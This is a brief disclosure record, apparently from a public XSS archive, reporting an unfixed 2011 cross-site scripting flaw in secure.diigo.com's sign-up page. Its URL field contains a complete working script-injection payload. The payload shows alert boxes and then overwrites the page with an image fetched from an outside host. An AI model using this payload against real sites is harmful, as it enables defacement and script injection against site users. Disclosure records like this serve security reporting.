Security researcher XSSTORM, has submitted on 10/11/2011 a cross-site-scripting (XSS) vulnerability affecting secure.diigo.com, which at the time of submission ranked 1491 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 13/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 10/11/2011 |
Date published: 13/12/2011 |
Fixed? Mail us! | Status: UNFIXED |
Author: XSSTORM |
Domain: secure.diigo.com |
Category: XSS |
Pagerank: 1491 |
URL: https://secure.diigo.com/sign-up?referInfo=length:1%7D//%3Cscript%3Ealert%28%22XSSTORM%22%29%3C/scri pt%3E%3Cscript%3Ealert%28%22Evolution%20of%20Revolution%22%29%3C/script%3E%3Cscript%3Ealert%28%22Our %20Time%20is%20Now%22%29%3C/script%3E%3Cscript%3Efunction%20do_main%28%29%7Bdocument.body.innerHTML% 20=%20%22%3Cimg%20src=%5C%22http://bobtherieau.com/webcam_files/anon.png%20%5C%22%20/%3E%22;%7Ddo_ma in%28%29;%3C/script%3E// |
Click here to view the mirror
|
|
|